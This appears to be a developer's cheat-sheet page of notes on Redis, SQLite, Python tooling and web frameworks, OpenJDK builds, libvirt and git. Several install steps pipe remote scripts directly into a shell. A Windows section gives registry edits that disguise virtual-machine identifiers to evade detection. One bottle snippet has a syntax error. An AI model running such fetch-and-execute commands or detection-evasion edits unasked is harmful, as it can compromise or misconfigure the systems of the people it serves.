When a Redis instance is a master, it refuses client writes if it cannot write to at least min-slaves-to-write slaves. Because replication is asynchronous, being unable to write to a slave means the slave is disconnected or has not requested replication data within min-slaves-max-lag seconds. A runtime sketch follows.
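A runtime sketch of the same two options via CONFIG SET (on Redis >= 5 they are named min-replicas-to-write / min-replicas-max-lag):

redis-cli config set min-slaves-to-write 1
redis-cli config set min-slaves-max-lag 10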

Subscribing to messages from sentinel

psubscribe *
psubscribe sdown
<instance-type> <name> <ip> <port> @ <master-name> <master-ip> <master-port>

Format of all received messages:

    +reset-master <instance details> -- the master was reset.
    +slave <instance details> -- a new slave was detected and added to the slave list.
    +failover-state-reconf-slaves <instance details> -- failover state changed to reconf-slaves.
    +failover-detected <instance details> -- a failover happened.
    +slave-reconf-sent <instance details> -- the sentinel sent a SLAVEOF command to reconfigure the slave.
    +slave-reconf-inprog <instance details> -- the slave is being reconfigured as a slave of another master, but replication has not started yet.
    +slave-reconf-done <instance details> -- the slave has been reconfigured and replication is now in sync with the new master.
    -dup-sentinel <instance details> -- duplicate sentinels for the given master were removed (can happen when a sentinel restarts).
    +sentinel <instance details> -- a new sentinel for this master was detected.
    +sdown <instance details> -- the instance entered SDOWN state.
    -sdown <instance details> -- the instance left SDOWN state.
    +odown <instance details> -- the instance entered ODOWN state.
    -odown <instance details> -- the instance left ODOWN state.
    +new-epoch <instance details> -- the current epoch (configuration version) was updated.
    +try-failover <instance details> -- failover conditions were met; waiting for election by the other sentinels.
    +elected-leader <instance details> -- this sentinel was elected to perform the failover.
    +failover-state-select-slave <instance details> -- started looking for a slave to promote.
    no-good-slave <instance details> -- no suitable slave to promote was found.
    selected-slave <instance details> -- a suitable slave to promote was found.
    failover-state-send-slaveof-noone <instance details> -- switching the selected slave to the master role.
    failover-end-for-timeout <instance details> -- the failover failed due to timeout.
    failover-end <instance details> -- the failover completed successfully.
    switch-master <master name> <oldip> <oldport> <newip> <newport> -- the master's address changed. Usually this is the message clients care about most.
    +tilt -- entered Tilt mode.
    -tilt -- left Tilt mode.

3.5.6 - Redis Type

redisObject

The core of the Redis type system: every key and value in the database, and every argument Redis itself processes, is represented by this type.

// server.h
/* The actual Redis Object */
#define OBJ_STRING 0    /* String object. */
#define OBJ_LIST 1      /* List object. */
#define OBJ_SET 2       /* Set object. */
#define OBJ_ZSET 3      /* Sorted set object. */
#define OBJ_HASH 4      /* Hash object. */

/* Objects encoding. Some kind of objects like Strings and Hashes can be
 * internally represented in multiple ways. The 'encoding' field of the object
 * is set to one of this fields for this object. */
#define OBJ_ENCODING_RAW 0     /* Raw representation */
#define OBJ_ENCODING_INT 1     /* Encoded as integer */
#define OBJ_ENCODING_HT 2      /* Encoded as hash table */
#define OBJ_ENCODING_ZIPMAP 3  /* Encoded as zipmap */
#define OBJ_ENCODING_LINKEDLIST 4 /* No longer used: old list encoding. */
#define OBJ_ENCODING_ZIPLIST 5 /* Encoded as ziplist */
#define OBJ_ENCODING_INTSET 6  /* Encoded as intset */
#define OBJ_ENCODING_SKIPLIST 7  /* Encoded as skiplist */
#define OBJ_ENCODING_EMBSTR 8  /* Embedded sds string encoding */
#define OBJ_ENCODING_QUICKLIST 9 /* Encoded as linked list of ziplists */
#define OBJ_ENCODING_STREAM 10 /* Encoded as a radix tree of listpacks */

typedef struct redisObject {
    // object type: OBJ_STRING etc.
    unsigned type:4;
    // encoding: OBJ_ENCODING_RAW etc.
    unsigned encoding:4;
    // #define LRU_BITS 24
    // LRU time
    unsigned lru:LRU_BITS; /* LRU time (relative to global lru_clock) or
                            * LFU data (least significant 8 bits frequency
                            * and most significant 16 bits access time). */
    // reference count
    int refcount;
    // pointer to the actual value
    void *ptr;
} robj;

Type introspection

A few commands report how a value is stored (a short session follows):

type keyname

returns the type: REDIS_STRING, REDIS_LIST, REDIS_HASH, REDIS_SET, or REDIS_ZSET

object encoding keyname

returns the encoding, e.g. int, embstr, or raw for REDIS_STRING

object idletime keyname (unit is seconds)

LRU: time since last access

object refcount keyname

reference count; mainly meaningful for shared number-format string objects
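A short session illustrating these commands (assumes a local Redis; encoding names vary across versions):

redis-cli rpush mylist a b c
redis-cli type mylist              # list
redis-cli object encoding mylist   # quicklist (ziplist on older versions)
redis-cli object idletime mylist   # seconds since last access
redis-cli set counter 123
redis-cli object refcount counter  # large for shared integer objects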

String

Simple Dynamic String

struct sdshdr {
    int len;
    int free;
    char buf[];
};

REDIS_STRING

int — value stored as a long (8 bytes)

embstr — read-only strings of at most 39 bytes

raw — strings longer than 39 bytes (a quick demo follows)
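A sketch of the encoding transitions (assumes a local Redis; the embstr threshold is 39 bytes up to Redis 3.0 and 44 bytes from 3.2 on):

redis-cli set n 12345
redis-cli object encoding n   # int
redis-cli set s hello
redis-cli object encoding s   # embstr
redis-cli append s " world"
redis-cli object encoding s   # raw (append always converts to raw)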

3.6 - Sqlite

cmd

.help
.databases
.tables

Sample

-- jdbc:mysql://localhost:3306?useSSL=false&serverTimezone=UTC&allowPublicKeyRetrieval=true
-- jdbc:sqlite:test.sqlite
create database test;

create table student (
    name varchar(100) not null primary key,
    class varchar(100),
    gender varchar(100),
    age smallint default -1,
    height decimal(16,6),
    weight decimal(16,6)
);

insert into student values
('john','a','male',27,173,78),
('paul','a','male',27,179,73),
('george','b','male',25,182,69),
('ringer','c','male',24,169,59),
('yoko','a','female',33,165,53),
('rita','b','female',25,163,57),
('lucy','c','female',28,175,60);

date,subject,student_name,score

create table score (
    `date` date not null,
    subject varchar(100),
    student_name varchar(100),
    score decimal(16,6)
);

insert into score values
('2020-08-04','chinese','john',60),
('2020-08-04','chinese','paul',75),
('2020-08-04','chinese','george',55),
('2020-08-04','chinese','ringer',81),
('2020-08-04','chinese','yoko',95),
('2020-08-04','chinese','rita',72),
('2020-08-04','chinese','lucy',88),
('2020-08-04','math','john',96),
('2020-08-04','math','paul',100),
('2020-08-04','math','george',65),
('2020-08-04','math','ringer',87),
('2020-08-04','math','yoko',77),
('2020-08-04','math','rita',85),
('2020-08-04','math','lucy',98),
('2020-08-04','pe','john',82),
('2020-08-04','pe','paul',97),
('2020-08-04','pe','george',71),
('2020-08-04','pe','ringer',100),
('2020-08-04','pe','yoko',85),
('2020-08-04','pe','rita',52),
('2020-08-04','pe','lucy',75),
('2020-08-05','chinese','john',64),
('2020-08-05','chinese','paul',80),
('2020-08-05','chinese','george',42),
('2020-08-05','chinese','ringer',91),
('2020-08-05','chinese','yoko',100),
('2020-08-05','chinese','rita',79),
('2020-08-05','chinese','lucy',82),
('2020-08-05','math','john',91),
('2020-08-05','math','paul',90),
('2020-08-05','math','george',73),
('2020-08-05','math','ringer',76),
('2020-08-05','math','yoko',87),
('2020-08-05','math','rita',81),
('2020-08-05','math','lucy',100),
('2020-08-05','pe','john',88),
('2020-08-05','pe','paul',100),
('2020-08-05','pe','george',67),
('2020-08-05','pe','ringer',91),
('2020-08-05','pe','yoko',92),
('2020-08-05','pe','rita',60),
('2020-08-05','pe','lucy',73);
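A sample aggregate over this data via the sqlite3 CLI (a sketch; assumes the two tables above were created in test.sqlite):

sqlite3 test.sqlite "select student_name, avg(score) as avg_score from score group by student_name order by avg_score desc;"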

4 - Lang

4.1 - JVM

4.1.1 - Maven

test

# org.apache.maven.plugins:maven-surefire-plugin:2.22.0
mvn -Dtest=TestApp1,TestApp2 test
mvn -Dtest=TestApp1#testHello* test
# match pattern 'testHello*' and 'testMagic*' 
mvn -Dtest=TestApp1#testHello*+testMagic* test

4.1.2 - OpenJDK

compile openjdk

jdk18 on mac
git clone https://github.com/openjdk/jdk18.git --depth=1
# autoconf=2.71, ccache=4.6.3, freetype=2.12.1
brew install autoconf ccache freetype

bash ./configure --help
# --enable-debug : --with-debug-level=fastdebug --with-debug-level=slowdebug
# --with-jvm-variants=server
# --with-num-cores=8
# --with-memory-size=8192

# MacOS
# configure: error: No xcodebuild tool and no system framework headers found
sudo rm -rf /Library/Developer/CommandLineTools
sudo xcode-select --install
# jdk17+ require xcode itself
bash ./configure --with-debug-level=slowdebug --enable-ccache --disable-warnings-as-errors
make images
./build/macosx-x86_64-normal-server-slowdebug/jdk/bin/java -version
jdk8u
# jdk8u
bash ./configure --with-num-cores=8 --with-debug-level=slowdebug
jdk17 on debian10
# gcc 10.3 also works
sudo apt install g++-10

# Compile jdk17 on debian 11.2 gcc 10.2
git clone https://github.com/openjdk/jdk17 --depth=1
cd jdk17

# tools
sudo apt install gcc g++ make autoconf ccache zip 

# Boot JDK
sudo apt install openjdk-17-jdk

# header files
sudo apt install -y libx11-dev libxext-dev libxrender-dev libxrandr-dev libxtst-dev libxt-dev
sudo apt install -y libcups2-dev libfontconfig1-dev libasound2-dev

bash ./configure --with-debug-level=slowdebug --enable-ccache
make images

4.1.3 - Scala

Scala syntax

// import everything from math except cos
import math.{cos => _, _}

object HelloWorld {
    def main(args: Array[String]): Unit = {
        val myVal: String = "Hello World!"
        var myVar: Long = System.currentTimeMillis()
        myVar += 1
        val name = myVal: Object // type ascription (upcast)
        println(s"$myVal")
    }
    def patternMatch(x: Any): Any = x match {
        case 1 => 1
        case "five" => 5
        case _ => 0
    }
}
trait Animal {
    final val age = 18
    val color: String
    val kind = "Animal"
    def eq(x: Any): Boolean
    def ne(x: Any): Boolean = !eq(x)
}
class Cat extends Animal {
    override val color = "Yellow"
    override val kind = "Cat"
    def eq(x: Any): Boolean = false
}
class Dog(name: String) extends Animal {
    def this() = this("Dog")
    override val color = "Brown"
    def eq(x: Any): Boolean = true
}
trait Traversable {
    def foreach[U](f: Elem => U): Unit
}

trait Iterable extends Traversable

trait Seq extends Iterable
trait Set extends Iterable
trait Map extends Iterable

import collection.JavaConversions._

4.2 - Python

4.2.1 - Async Python

gunicorn

< A Python WSGI HTTP server that runs on Unix-like OSes, inspired by Ruby's unicorn
< pre-fork worker model: one master process manages multiple worker processes
< recommended number of workers: (2 * $num_cores) + 1

pip install gunicorn greenlet eventlet gevent

# -k, --worker-class : worker mode
gunicorn -k sync --workers=17 --threads 1 --worker-connections 1000
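The worker count above is hard-coded; a sketch deriving it from the CPU count instead (Linux nproc; myapp:app is a placeholder WSGI entry point):

gunicorn -k sync --workers=$(( 2 * $(nproc) + 1 )) myapp:app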

sync: multi-process mode

Each worker handles one request at a time.

eventlet, gevent: coroutine modes

Cooperative multi-threading: asynchronous IO lets a process move on to the next request while waiting for an IO reply.

gthread: multi-threaded mode

Thread-based workers; connections are managed via a thread pool.

gaiohttp

Asynchronous I/O implemented with the aiohttp library.

4.2.2 - Database client in Python

mysql

# pip3 install PyMySQL
import pymysql

db = pymysql.connect(host="localhost", user="user", password="passwd", database="testdb")
cursor = db.cursor()

cursor.execute("SELECT VERSION()")
print(f"Database version : {cursor.fetchone()}")

try:
   cursor.execute("DROP TABLE IF EXISTS EMPLOYEE")
   db.commit()
except:
   db.rollback()

cursor.execute("SELECT 1")
rows = cursor.fetchall()
for row in rows:
    print(row[0])

db.close()

rabbitmq

import pika

connection = pika.BlockingConnection(pika.ConnectionParameters('127.0.0.1', 5672))
channel = connection.channel()
channel.queue_declare(queue='hello')
channel.basic_publish(exchange='', routing_key='hello', body='Hello World!')
print("[x] Sent 'Hello World!'")
connection.close()

4.2.3 - Install Python

pyenv

curl https://pyenv.run | bash

pyenv install --list
pyenv versions
pyenv global 3.7.15

install python2.7

sudo apt install make gcc g++ patch cmake -y

sudo apt install libssl-dev libbz2-dev libreadline-dev zlib1g-dev libsqlite3-dev libffi-dev lzma-dev libsnappy-dev libjpeg-dev default-libmysqlclient-dev -y
pyenv install 2.7.18

build from source

wget http://www.python.org/ftp/python/3.7.15/Python-3.7.15.tgz
tar -zxvf Python-3.7.15.tgz
cd Python-3.7.15

./configure --prefix=/opt/python3 --enable-optimizations
make
make install
make clean
make distclean

/opt/python3/bin/python3 -V

python2

debian9

# docker pull debian:9
# docker run -d -it --name debian9 debian:9
# https://mirrors.tuna.tsinghua.edu.cn/help/debian/
apt update 
apt install python python-pip -y
pip install -U setuptools
apt install make gcc g++ patch cmake -y
apt install libssl-dev libbz2-dev libreadline-dev zlib1g-dev libsqlite3-dev libffi-dev lzma-dev libsnappy-dev libjpeg-dev default-libmysqlclient-dev -y
# mysql-python
# for old debian: libmysqlclient-dev
apt install default-libmysqlclient-dev -y
pip install mysql-python

# pyarrow
apt install -y -V ca-certificates lsb-release wget
wget https://apache.jfrog.io/artifactory/arrow/$(lsb_release --id --short | tr 'A-Z' 'a-z')/apache-arrow-apt-source-latest-$(lsb_release --codename --short).deb -O /tmp/apache-arrow.deb
apt -y install /tmp/apache-arrow.deb
apt -y update
apt -y install libarrow-dev libarrow-python-dev
rm /tmp/apache-arrow.deb

fedora

# docker pull fedora
# docker run -d -it --name fedora fedora
# https://mirrors.tuna.tsinghua.edu.cn/help/fedora/

# python2 is not included
# dnf whatprovides pip
# sudo alternatives --set python /usr/bin/python2

dnf update && dnf install git curl -y
curl https://pyenv.run | bash
cat <<EOF >> ~/.bashrc
export PYENV_ROOT="\$HOME/.pyenv"
command -v pyenv >/dev/null || export PATH="\$PYENV_ROOT/bin:\$PATH"
eval "\$(pyenv init -)"
EOF
source ~/.bashrc

dnf install make gcc g++ -y
dnf install readline-devel zlib-devel openssl-devel bzip2-devel sqlite-devel libffi-devel lzma-sdk-devel -y
pyenv install 2.7.18
pyenv global 2.7.18
# pyarrow
dnf install cmake libarrow-devel libarrow-python-devel -y
pip install arrow pyarrow

# mysql-python
dnf install mysql-devel -y
pip install mysql-python

4.2.4 - IPython

ipython

ipython --pylab

4.2.5 - Python Pip

Install pip

wget https://bootstrap.pypa.io/get-pip.py -O - | python

Install packages for Mac ARM

numpy

brew install openblas
OPENBLAS="$(brew --prefix openblas)" pip install numpy

4.2.6 - Python Std

base

datetime & time

import datetime
import time

dt = datetime.datetime.now()
unix_sec = time.mktime(dt.timetuple())
dt = datetime.datetime.fromtimestamp(time.time())

s = dt.strftime("%Y-%m-%d %H:%M:%S")
dt = datetime.datetime.strptime(s, "%Y-%m-%d %H:%M:%S")
unix_sec = time.mktime(time.strptime(s, "%Y-%m-%d %H:%M:%S"))
s = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(unix_sec))

random

import random

n_float = random.uniform(0, 10) # 0 <= x <= 10
n_float = random.random() # [0, 1.0)

# random.randrange([start], stop[, step])
n_int = random.randint(1, 3) # [1, 3]

s_str = random.choice(['r', 'g', 'b'])
s_list = random.sample(['r', 'g', 'b'], 2)

file

ConfigParser

import ConfigParser
conf = ConfigParser.ConfigParser()
conf.read("myapp.ini")
sections = conf.sections()
section = sections[0]
keys = conf.options("sec")
kvs = conf.items("sec")
val = conf.get("sec", "key")
int_val = conf.getint("sec", "key")

4.2.7 - Python Test

unittest

import unittest

class TestStringMethods(unittest.TestCase):

    def test_somecase(self):
        self.assertEqual('foo'.upper(), 'FOO')
        self.assertTrue('FOO'.isupper())
        self.assertFalse('Foo'.isupper())

if __name__ == '__main__':
    unittest.main()
python -m unittest test_module1 test_module2
python -m unittest test_module.TestClass
python -m unittest test_module.TestClass.test_method

python -m unittest -v tests/test_something.py

4.2.8 - Python Web

std

python3 -m http.server 3333
python -m SimpleHTTPServer 3333

fastapi

Python 3.7+

http://127.0.0.1:8000/docs for https://github.com/swagger-api/swagger-ui
http://127.0.0.1:8000/redoc for https://github.com/Rebilly/ReDoc

pip install "fastapi[all]"
# use the 'app' object in module fastapi_main (file fastapi_main.py); hyphens are not valid in Python module names
uvicorn fastapi_main:app --reload
from fastapi import FastAPI

app = FastAPI()

@app.get("/")
async def root(secs: float):
    from time import sleep
    sleep(secs)
    return {"message": "Hello World"}

flask

pip install Flask
python -m flask run 
from flask import Flask, request

app = Flask(__name__)

@app.route("/")
def hello_world():
        secs = request.args.get("secs")
        from time import sleep
        sleep(float(secs))
        return {"message": "Hello World"}

if __name__ == '__main__':
    app.run(debug=True)

django

pip install Django
django-admin startproject mysite
cd mysite
python manage.py runserver 0.0.0.0:8000

bottle

from bottle import request, route, run, template
from time import sleep

@route('/hello/<name>')
def hello(name):
    return template('<b>Hello {{name}}</b>!', name=name)

@route('/')
def index():
    secs = request.query.get('secs')
    name = request.query.get('name')
    if secs:
        sleep(float(secs))
    if not name:
        name = "World
    return "Hello {}!".format(name)

run(host='0.0.0.0', port=8000)

trollius

import trollius as asyncio
from trollius import From

@asyncio.coroutine
def factorial(name, number):
    f = 1
    for i in range(2, number + 1):
        print("Task %s: Compute factorial(%d)..." % (name, i))
        yield From(asyncio.sleep(1))
        f *= i
    print("Task %s completed! factorial(%d) is %d" % (name, number, f))

loop = asyncio.get_event_loop()
tasks = [
    asyncio.async(factorial("A", 8)),
    asyncio.async(factorial("B", 3)),
    asyncio.async(factorial("C", 4))]
loop.run_until_complete(asyncio.wait(tasks))
loop.close()

4.3 - Shell

4.3.1 - Frequently used cmds

stat

tree -if | grep -v node_modules | egrep '[.](j|t)sx?$' | xargs wc -l

4.3.2 - Gnu Tools

datetime

date

# e.g. 2020-12-31 23:59:59
# %H 00-23, %M 00-59, %S 00-59
# %t tab char
# %I 01-12
# %j 001-366
# %D MM/dd/yy
# %T hh:mm:ss
date "+%Y-%m-%d %H:%M:%S"

# timestamp, in sec
date +%s

cal

# print cal
cal
cal 9 1752

5 - Ops

5.1 - Os

5.1.1 - CoreOS

rpm-ostree

# omz chsh
sudo rpm-ostree install git wget zsh vim util-linux-user
# compile
sudo rpm-ostree install make gcc g++ patch
# pkg
sudo rpm-ostree install dnf

sudo systemctl reboot

python

curl https://pyenv.run | bash

# add to ~/.zshrc
cat <<EOF >> ~/.zshrc
export PYENV_ROOT="\$HOME/.pyenv"
command -v pyenv >/dev/null || export PATH="\$PYENV_ROOT/bin:\$PATH"
eval "\$(pyenv init -)"
EOF

# dep lib to compile
sudo rpm-ostree install readline-devel zlib-devel openssl-devel bzip2-devel sqlite-devel libffi-devel lzma-sdk-devel

pyenv versions
pyenv install 2.7.18
pyenv install 3.9.13
pyenv global 2.7.18

# pyarrow
sudo rpm-ostree install libarrow-devel libarrow-python-devel

5.1.2 - libvirt

install

  • mac
brew install qemu gcc libvirt
brew install virt-manager

# macOS doesn't support QEMU security features
echo 'security_driver = "none"' >> /opt/homebrew/etc/libvirt/qemu.conf
echo "dynamic_ownership = 0" >> /opt/homebrew/etc/libvirt/qemu.conf
echo "remember_owner = 0" >> /opt/homebrew/etc/libvirt/qemu.conf

brew services start libvirt

vagrant

# https://developer.fedoraproject.org/tools/vagrant/vagrant-libvirt.html
# https://vagrant-libvirt.github.io/vagrant-libvirt/installation.html

# vagrant plugin install vagrant-libvirt
Vagrant.configure("2") do |config|
  config.vm.provider :libvirt do |libvirt|
    libvirt.driver = "qemu"
  end
end
# export VAGRANT_DEFAULT_PROVIDER=libvirt
# vagrant up --provider=libvirt

create

from iso

mkdir ~/vms && cd ~/vms

qemu-img create -f qcow2 debian.qcow2 50G
virsh define debian.xml
virsh start debian
virsh list

from qcow2/raw

# https://cdimage.debian.org/images/cloud/stretch/daily/
# yum install qemu-kvm qemu-kvm-tools virt-manager libvirt virt-install -y

virt-install --name debian --ram 2048 --vcpus=2 --disk path=debian.qcow2 --network=bridge:en0 --force --import --autostart
virsh console --domain debian --force

# KVM format convert
qemu-img convert -p -t directsync -O qcow2 test.raw test.qcow2
qemu-img convert -p -t directsync -O raw test.qcow2 test.raw

5.1.3 - Oh My Zsh

zsh

sh -c "$(curl -fsSL https://raw.github.com/ohmyzsh/ohmyzsh/master/tools/install.sh)" 

cp ~/.oh-my-zsh/themes/agnoster.zsh-theme ~/.oh-my-zsh/custom/themes/
mv ~/.oh-my-zsh/custom/themes/agnoster.zsh-theme ~/.oh-my-zsh/custom/themes/myagnoster.zsh-theme
# vim ~/.oh-my-zsh/custom/themes/myagnoster.zsh-theme
# replace blue with cyan
# vim ~/.zshrc
# ZSH_THEME="myagnoster"

# add zsh-autosuggestions zsh-syntax-highlighting
cd ~/.oh-my-zsh/custom/plugins
git clone https://github.com/zsh-users/zsh-autosuggestions --depth 1
git clone https://github.com/zsh-users/zsh-syntax-highlighting --depth 1
# . ~/.zshrc

vim

Vim-Plug

# PlugInstall [pluginName]
# PlugUpdate [pluginName]
# PlugDiff : show changelog
# PlugUpgrade : upgrade itself
# PlugStatus
# PlugClean
# PlugSnapshot [filePath] : save a snapshot
curl -fLo ~/.vim/autoload/plug.vim --create-dirs https://raw.githubusercontent.com/junegunn/vim-plug/master/plug.vim
" ~/.vim/bundle for Vundle(https://github.com/VundleVim/Vundle.vim
) compatibility
" Plug 'userName/repoName' or Plug 'pluginName' for https://github.com/vim-scripts
" Vim-Plug download Plugin like this: git -C ~/.vim/bundle clone --recursive https://github.com/vim-scripts/L9.git

call plug#begin('~/.vim/bundle')
    " Plug 'file:///path/to/plugin'
    " Plug "git:https://exmaple.com/user/repo.git"

    " dir tree
    Plug 'preservim/nerdtree'
    " start screen
    Plug 'mhinz/vim-startify' 
    " highlighting and navigating through different words in a buffer
    Plug 'lfv89/vim-interestingwords'
    " Check syntax 
    Plug 'dense-analysis/ale'
    " lean & mean status/tabline for vim that's light as air
    Plug 'vim-airline/vim-airline'
call plug#end()

5.1.5 - Windows

Virtual machines

Removing virtual-machine identifiers

:: rename PRLS__ to NOBOX_
REG COPY HKLM\HARDWARE\ACPI\DSDT\PRLS__ HKLM\HARDWARE\ACPI\DSDT\NOBOX_ /s
REG DELETE HKLM\HARDWARE\ACPI\DSDT\PRLS__ /f

:: modify SystemBiosVersion
REG ADD HKLM\HARDWARE\DESCRIPTION\System /v SystemBiosVersion /t REG_MULTI_SZ /d "NOBOX   - 1\018.0.2 (53077)\0Some EFI x64 18.0.2-53077 - 12CF55\0" /f
REG ADD HKLM\HARDWARE\DESCRIPTION\System /v VideoBiosVersion /t REG_MULTI_SZ /d "" /f
pause

5.2 - VCS

5.2.1 - Git

git

# mkdir blog && cd blog
# git init
# git remote add origin git@github.com:tukeof/tukeof.github.io.git
git clone git://github.com/tukeof/tukeof.github.io.git blog
cd blog
git add *.md
git commit -m 'initial project version'
git push -u origin master

remote

# add a new remote Git repository
git remote add <shortname> <url>
git remote add origin git@github.com:tukeof/tukeof.github.io.git
git remote add origin ssh://username@127.0.0.1/reponame

git remote -v
git remote update
# renames the remote and all of its remote-tracking branch names
git remote rename <old_name> <new_name>
git remote rm <remote_name>

git remote show origin

# create a local tmp branch and fetch the remote origin master branch into it
git fetch origin master:tmp 
# diff the local code against what was just fetched
git diff tmp 
# merge the tmp branch into the local master branch
git merge tmp
# delete the tmp branch
git branch -d tmp
# fetch a remote branch and merge it into the given local branch
git pull origin master:<branch_name>

add, rm, commit, log

# -a, --all: automatically stage modified and deleted files
git commit -a -m 'message'

# remove a file from the working directory and the index
git rm <file>
# remove a directory from the index only
git rm -r --cached <dir>

git mv README.md README
# mv README.md README
# git rm README.md
# git add README

# --amend
# reuses the current index for the commit; if nothing changed since the last commit,
# the snapshot is identical and only the commit message changes
git commit --amend

# unstage changes
git reset HEAD <file>
# discard changes in the working directory
git checkout -- <file>

svn

# clone
svn co https://localhost/user/repo

svn co https://localhost/username/repo -r some_version
svn checkout https://localhost/username/repo/dir1/dir2/proj1

arc

# Phabricator
git clone https://github.com/phacility/libphutil.git
git clone https://github.com/phacility/arcanist.git

# add some_install_path/arcanist/bin to $PATH
# authenticate
arc install-certificate
arc set-config editor "vim"

# create a branch (git branch), or show the current branch and its associated revision
arc feature 
# create or update a revision, covering origin/master to the latest commit, including the index
arc diff
# list all revisions and their status
arc list
# land every commit on the current branch: pull --rebase first, then push
arc land
# show the commit range a diff would cover, and related info
arc which

Phabricator

// apply patch to current branch
arc patch --diff <patch_version_number> --nocommit --nobranch

5.2.2 - Git Checkout

branch

# list all branch, include local and remote
git branch -a
# delete branch
git branch -d <local_branch>
git push origin --delete <remote_branch>

# list commits, one line each
git log --pretty=oneline --abbrev-commit
git show <tag_name>
# tag a commit; the default commit is `HEAD`
git tag <tag_name> <commit_id>
git tag -a <tag_name> -m "message for tag" <commit_id>

# dangerous operation: this detaches HEAD, so avoid making changes until you check out a branch again
git checkout <tag_name>
# create a branch from a tag
git checkout -b <bra_name> <tag_name>

git tag -l "<prefix>*"
git push origin <tag_name>
# push all tags
git push origin --tags

# delete a local tag
git tag -d <tag_name>
# delete a remote tag
git push origin :refs/tags/<tag_name>

stash

# list the stash entries that you currently have. stash@{0} is the latest entry
git stash list
# save all uncommitted changes
git stash
# apply all uncommitted changes
git stash apply

merge-base

git merge-base origin/master HEAD

rebase

# Assume the following history exists and the current branch is "topic":
#       A - B - C topic
#      /  
# D - E - F - G master

git switch topic
git rebase master
git rebase master topic

# would be
#               A'--B'--C' topic
#              /
# D---E---F---G master
graph LR

E --> A --> B --> C(C topic)
D --> E --> F --> G(G master)
mkdir git-repo && cd git-repo
git init --bare
export remote_url=$(pwd)

cd ..
git clone $remote_url git
cd git

# D
echo $(uuidgen) > D && git add . && git commit -m 'D' && git push -u origin master
# D - E
echo $(uuidgen) > E && git add . && git commit -m 'E' && git push -u origin master

git checkout -b topic
git switch master
# D - E - F
echo $(uuidgen) > F && git add . && git commit -m 'F' && git push -u origin master
# D - E - F - G
echo $(uuidgen) > G && git add . && git commit -m 'G' && git push -u origin master

git switch topic
#       A
#      /  
# D - E - F
echo $(uuidgen) > A && git add . && git commit -m 'A' && git push -u origin topic
#       A - B
#      /  
# D - E - F
echo $(uuidgen) > B && git add . && git commit -m 'B' && git push -u origin topic
#       A - B - C topic
#      /  
# D - E - F master
echo $(uuidgen) > C && git add . && git commit -m 'C' && git push -u origin topic

revert

# revert to previous commit
git revert <previous-commit>

reset

# discard changes and reset files to master
git reset --hard origin/master

git reset --hard HEAD
# or save changes
git reset --soft HEAD 

# discard changes and reset to current branch
git checkout . && git clean -xdf

5.2.3 - Git Config

config

git help config
man git-config
git config --list

# convert to LF on commit, to CRLF on checkout
git config --global core.autocrlf true
# convert to LF on commit, no conversion on checkout
git config --global core.autocrlf input
# no conversion on commit or checkout
git config --global core.autocrlf false

# refuse to commit files with mixed line endings
git config --global core.safecrlf true
# allow committing files with mixed line endings
git config --global core.safecrlf false
# warn when committing files with mixed line endings
git config --global core.safecrlf warn

git config --global alias.co checkout
git config --global alias.br branch
git config --global alias.ci commit
git config --global alias.s status

git config --global alias.unstage 'reset HEAD --'
git config --global alias.last 'log -1 HEAD'
# git config --global alias.l '!ls -lah'
git config --global alias.url 'remote get-url --all origin'

# git config --global core.editor "'C:/Options/Notepad++/notepad++.exe' -multiInst -nosession"
git config --global core.editor vim

.gitconfig

[user]
	name = yourname
	email = youremail
[http]
    #proxy = socks5://127.0.0.1:1080
[https]
    #proxy = socks5://127.0.0.1:1080	
[core]
    autocrlf = input
    safecrlf = true
[alias]
    co = checkout
    br = branch
    ci = commit
    s = status
    last = log -1 HEAD
    lg = log --graph
    url = remote get-url --all origin  

.ssh/config

ssh-keygen -t rsa -b 4096 -C "youremail"
host *
    AddKeysToAgent yes
    UseKeychain yes
    TCPKeepAlive yes
    ServerAliveInterval 60
    ServerAliveCountMax 5
    
host github.com
  user git
  hostname github.com
  port 22
  identityfile ~/.ssh/id_rsa

5.2.4 - Git Hook

pre-commit

# https://pre-commit.com/#usage
pip install pre-commit pre-commit-hooks
# write to .git/hooks/pre-commit
pre-commit install
exclude: >
  (?x)(
      ^a/|
      ^b/c/|
      ^d/e/__init__.py
  )  
default_language_version:
    python: python3
repos:
  - repo: https://github.com/PyCQA/isort
    rev: 5.9.3 # tag
    hooks:
      - id: isort # sort imports
  - repo: https://github.com/psf/black
    rev: stable
    hooks:
      - id: black # code formatter
  - repo: https://github.com/pycqa/flake8
    rev: 4.0.1
    hooks:
      - id: flake8 # check the style and quality
        language_version: python2.7
        stages: [manual]

pre-push

5.2.5 - Git How-To

undo untracked

git reset --hard <commit_id>

# show which will be removed, include untracked directories
# -n --dry-run, Don't actually remove anything
git clean -d -n
# delete anyway, no confirm
git clean -d -f

undo not staged change (removal or modification)

# in the staging area but changed externally:
# touch a && git add a && rm a, then a has changes not staged

# discard changes in working directory
git restore <files>
# or
git checkout <files>
# update what will be committed
git add <files>

# caused by removal
git rm <files>
# or
git rm --cached <files>

undo add

# undo stage
git restore --staged <files>

# remove from staged space
git rm --cached d

undo commit

# message
git commit --amend -m 'message which will cover the old one'

# undo commit, but not undo add
# --soft, do not touch the index file nor the working tree
# --hard, match the working tree and index to the given tree
# --mixed, reset the index but not the working tree (default)
git reset --soft HEAD^
# undo <n> commits
git reset --soft HEAD~n

merge commit

# reapply n commits
git rebase -i HEAD~n

# pick
# squash
# ...
# squash

git add .
git rebase --continue
# git rebase --abort

git push --force

delete the last commit

# git interprets x^ as the parent of x,
# and + as a forced non-fast-forward push
git push origin +<second-last-commit>^:master

# or
git reset HEAD^ --hard
git push origin master -f

delete the second last commit

# this will open an editor and show a list of all commits since the commit we want to get rid of
# simply remove the line with the offending commit, likely that will be the first line
git rebase -i <second-last-commit>^

git push origin master -f

5.2.6 - Git Log

status

git init --bare /path/to/repo/.git
# git remote add origin /path/to/repo/.git
git clone /path/to/repo

# show paths that differ between the working tree and the current HEAD commit
git status
# --short
# A added.c
# M modified.cc
# R renamed.h
# D deleted.hh
git status -s

diff

# compare the working directory with the staging area
git diff
# --cached : compare staged changes against the last commit
git diff --staged

git diff oldCommit..newCommit

log

# list the commits made in this repository in reverse chronological order
git log
# -p, --patch : show the diff introduced by each commit
# -2 : show only the last two entries
# --stat : under each commit, list the modified files, how many files changed, and line counts added/removed
# --shortstat : only the changed/insertions/deletions line from --stat
# --pretty=oneline : print each commit on a single line
git log --pretty=oneline
# short hash - author name, date : subject
git log --pretty=format:"%h - %an, %ar : %s"
# --graph : add a small ASCII graph showing the branch and merge history
git log --pretty=format:"%h %s" --graph

git log -<n>
# --since, --after
# --until, --before
